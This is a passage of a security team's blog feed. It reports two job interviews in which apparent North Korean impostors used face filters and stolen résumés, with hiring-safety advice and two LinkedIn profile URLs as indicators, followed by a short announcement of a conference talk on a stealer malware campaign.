data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;normal&quot;,&quot;height&quot;:1536,&quot;width&quot;:1024,&quot;resizeWidth&quot;:334,&quot;bytes&quot;:3112065,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/177385196?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:&quot;center&quot;,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!OgGh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!OgGh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!OgGh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!OgGh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Sof&#237;a is our Talent Acquisition Specialist, and she came to us about a strange interview she&#8217;d just had with a candidate:</p><p></p><blockquote><p><em>&#8220;He applied for the position, saying he was from Jalisco, M&#233;xico. </em></p><p><em>He joined the call without his camera on, so I asked him to turn it on and then he looked really weird, literally like a robot, and his mouth moved in a strange way. </em></p><p><em>I asked him if he spoke Spanish and he told me &#8216;no&#8217;. </em></p><p><em>I just recorded him and hung up. </em></p><p><em>Now his LinkedIn profile is gone...&#8221;</em></p></blockquote><p></p><p>Our team investigated her recordings and, to nobody&#8217;s surprise, there it was. A North Korean agent with his face undergoing real-time AI-powered surgery to stylise his cheeks, mouth, and chin to a point where every minimal facial gesture would threaten to snap the fragile digital sutures holding the magic together. </p><p></p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;0216f5d6-11ba-4292-bb74-d72387b66745&quot;,&quot;duration&quot;:null}"></div><p></p><p>If that wasn&#8217;t a dead giveaway, we also recorded him speaking, and as Sof&#237;a said, his mouth was shut tight, and when it moved (if it ever did), his teeth didn&#8217;t accompany the movement and his lips never modulated any of the words he was saying (like in &#8220;<em>authentication</em>&#8221;). </p><p></p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;e414ffdb-9602-4ce3-9458-502e1dfe4227&quot;,&quot;duration&quot;:null}"></div><p></p><p><strong>He claimed to be from Jalisco</strong>, M&#233;xico, having studied engineering at a Mexican university, <strong>but didn&#8217;t speak a single word of Spanish</strong> (<a href="https://quetzal.bitso.com/p/interview-with-the-chollima-ii">does this ring a bell from a previous article?</a>). In the end, we found out <strong>he&#8217;d stolen a r&#233;sum&#233; from a real engineer</strong> (along with his name) and stitched it all together, just like his fake face, to try his luck.</p><p>Armed with that information, we started writing our threat report, but just two days later, Sof&#237;a came back with more bad news: </p><p></p><blockquote><p><em>&#8220;I think it just happened again.</em></p><p><em>This time, he didn&#8217;t look quite as robotic, but it&#8217;s the same story: an Asian man claiming to be from Chihuahua who doesn&#8217;t speak Spanish. Yet his LinkedIn says he studied engineering at the University of Chihuahua.</em></p><p><em>Very suspicious! Obviously, I hung up on him too&#8230;&#8221;</em></p></blockquote><p></p><p>She recorded this interview as well, and we were able to see <strong>a nervous young man</strong> <strong>with subtle filtering</strong> instead of a cheap, clandestine AI facial reconstruction. </p><p>He was <strong>anxiously shaking</strong> whilst she spoke (<code>00:00 - 00:06</code>), as though preparing to answer her questions. When doing so, <strong>he constantly rocked his head and torso back and forth</strong>, over-gesticulating with his brows occasionally. </p><p></p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;a9b41472-3f10-4ea8-a58c-bc55bccca802&quot;,&quot;duration&quot;:null}"></div><p></p><p>His nervousness is puzzling, I&#8217;m certain he&#8217;s done harder things like, according to his r&#233;sum&#233;, <strong>pursuing a highly technical engineering degree in a Spanish-speaking country&#8230; without speaking a single word of the language</strong>. Remarkable, honestly.  </p><p>Sof&#237;a knew the LinkedIn profile would vanish the moment she hung up (as happened before), <strong>so she recorded that too</strong>:</p><p></p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;375104ba-a63f-4236-a06d-90c30d6df4f5&quot;,&quot;duration&quot;:null}"></div><p></p><p>With this, we pulled some strings and found out, once again, the real person this synthetic had cloned: a real engineer with a real degree, a real face, and, well, basically a real life.</p><p>That makes <strong>two North Korean infiltration attempts</strong> dodged in the same week. But to say we were lucky twice would be an understatement, as luck played no part in this tale. Sof&#237;a recognised the warning signs immediately because we&#8217;d discussed these threats before (lots of times). That&#8217;s all it took: <strong>being aware</strong> that this kind of infiltration attempt actually happens, and that <strong>we&#8217;re a constant target</strong> for them. When the impostor appeared on her call, she did what we always do: <strong>recorded everything</strong> and got the team involved <strong>immediately</strong>.</p><p>We continued our investigation and found <strong>interesting details</strong> about these runaway <em>synthetics</em> (as if having their faces on tape was <em>something minor</em>): <strong>Mateo</strong> and <strong>Alfredo</strong> were loyal customers of <strong><a href="https://spur.us/astrill-vpn-and-remote-worker-fraud/">Astrill</a></strong><a href="https://spur.us/astrill-vpn-and-remote-worker-fraud/"> </a><strong><a href="https://spur.us/astrill-vpn-and-remote-worker-fraud/">VPN</a></strong>, a popular VPN service used by Chinese users to bypass the Great Firewall, <a href="https://www.trendmicro.com/en_us/research/25/d/russian-infrastructure-north-korean-cybercrime.html">and also by DPRK IT workers to defraud companies</a>. </p><p>Their assigned IP addresses placed them in <strong>Europe</strong>, but they were actually tunnelling through to a <strong>US-based host</strong>.</p><p>Using a <strong>residential</strong> US IP address.</p><p>Which is part of a <strong>laptop farm</strong>. </p><p>To which they jump into using <strong>a popular remote desktop tool.</strong></p><p>You may wonder how we discovered this&#8230; but that&#8217;s a story for <strong>Interview with the Chollima IV</strong>.</p><div><hr></div><h2>Lessons learned</h2><p>If you asked us a year ago about this threat, we would have said that people in the [crypto] space were in danger. Today, the financial, crypto, and even the architecture and civil engineering fields are being targeted, and soon more will be. </p><p><strong>Ask your Compliance Team</strong> about <strong>recording interview</strong>s, don&#8217;t hesitate to involve your security team if a candidate acts suspicious, always double check your candidate&#8217;s background (these guys usurp other people&#8217;s lives and even SSNs, so <strong>triple check</strong> if possible), and <em>check IDs at the door</em>: ask your candidates to show an ID when they come (again, checking with your <strong>Compliance Team</strong>). All exam providers do, and their relationship with customers is a one-time one. You are here to hire someone for a little longer than that.</p><div><hr></div><h2>Outro</h2><p>Returning to Philip K. Dick&#8217;s work, he described the &#8220;<em>andys</em>&#8221; as synthetic life-forms that <strong>mimicked real humans</strong> and <strong>were nearly impossible to distinguish</strong> from them. </p><p>But he also wrote in <a href="https://en.wikipedia.org/wiki/Do_Androids_Dream_of_Electric_Sheep%3F">that same book</a> about the &#8220;<em>chickenheads</em>&#8221;, humans who were <strong>simply not bright enough</strong>, struggling daily to cling to a world that constantly advances and refuses to wait for them to adapt.</p><p>I think I mislabelled our subjects in this article.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tQ4o!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tQ4o!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!tQ4o!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!tQ4o!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!tQ4o!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tQ4o!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png" width="300" height="300" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:300,&quot;bytes&quot;:2632613,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/177385196?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!tQ4o!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!tQ4o!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!tQ4o!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!tQ4o!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F148c2e6a-e508-4785-b986-376df0a08a5d_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div><hr></div><h2>IOCs</h2><pre><code>URL:https://www.linkedin.com/in/alfredo-solares-garcia/
URL:https://www.linkedin.com/in/mateo-jimenez-aaa304379/</code></pre><div><hr></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZdHh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZdHh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png 424w, https://substackcdn.com/image/fetch/$s_!ZdHh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png 848w, https://substackcdn.com/image/fetch/$s_!ZdHh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png 1272w, https://substackcdn.com/image/fetch/$s_!ZdHh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZdHh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png" width="150" height="150" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1280,&quot;width&quot;:1280,&quot;resizeWidth&quot;:150,&quot;bytes&quot;:70380,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/177385196?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZdHh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png 424w, https://substackcdn.com/image/fetch/$s_!ZdHh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png 848w, https://substackcdn.com/image/fetch/$s_!ZdHh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png 1272w, https://substackcdn.com/image/fetch/$s_!ZdHh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa303ef93-af5a-4d98-ab13-2c8fb2212552_1280x1280.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><p></p><p></p>]]></content:encoded></item><item><title><![CDATA[Quetzal Team at Nerdearla!]]></title><description><![CDATA[This time, it&#8217;s better to leave that ticket unanswered]]></description><link>https://quetzal.bitso.com/p/quetzal-team-at-nerdearla</link><guid isPermaLink="false">https://quetzal.bitso.com/p/quetzal-team-at-nerdearla</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Fri, 03 Oct 2025 18:31:00 GMT</pubDate><enclosure url="https://substackcdn.com/image/youtube/w_728,c_limit/A5wwwGRA4iE" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>How do you say &#8220;help&#8221; in Chinese?</h2><p>It&#8217;s a regular day at the support desk&#8230; until a ticket arrives, written <strong>entirely in Chinese</strong>.</p><p>The sender insists something isn&#8217;t working and attaches a compressed file with &#8220;screenshots&#8221;. But nothing is what it seems&#8230;</p><p>In this talk, <strong>Leo</strong> and <strong>Javy</strong> share their work profiling an active campaign where Chinese-speaking threat actors distribute a newly discovered malware, <em>Zhong Stealer</em>, through fake support tickets targeting platforms in the crypto ecosystem.</p><p>They did an excellent job turning a complex subject into an engaging and easy-to-follow story. </p><p>So here&#8217;s our talk at <strong>Nerdearla</strong> [in Spanish], hope you enjoy it!</p><div id="youtube2-A5wwwGRA4iE" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;A5wwwGRA4iE&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/A5wwwGRA4iE?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><div><hr></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jsVn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jsVn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jsVn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic" width="119" height="119" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1280,&quot;width&quot;:1280,&quot;resizeWidth&quot;:119,&quot;bytes&quot;:73912,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/172519068?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!jsVn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div>]]></content:encoded></item><item><title><![CDATA[Today's host: AMOS Stealer]]></title><description><![CDATA[A fake podcast with real consequences]]></description><link>https://quetzal.bitso.com/p/todays-host-amos-stealer</link><guid isPermaLink="false">https://quetzal.bitso.com/p/todays-host-amos-stealer</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Wed, 17 Sep 2025 17:59:10 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!-Aik!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!-Aik!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!-Aik!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!-Aik!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!-Aik!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!-Aik!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!-Aik!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png" width="372" height="372" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:372,&quot;bytes&quot;:2490548,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/173846074?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!-Aik!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!-Aik!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!-Aik!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!-Aik!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8344d52-9d27-433c-9f40-6466c197de62_1024x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" 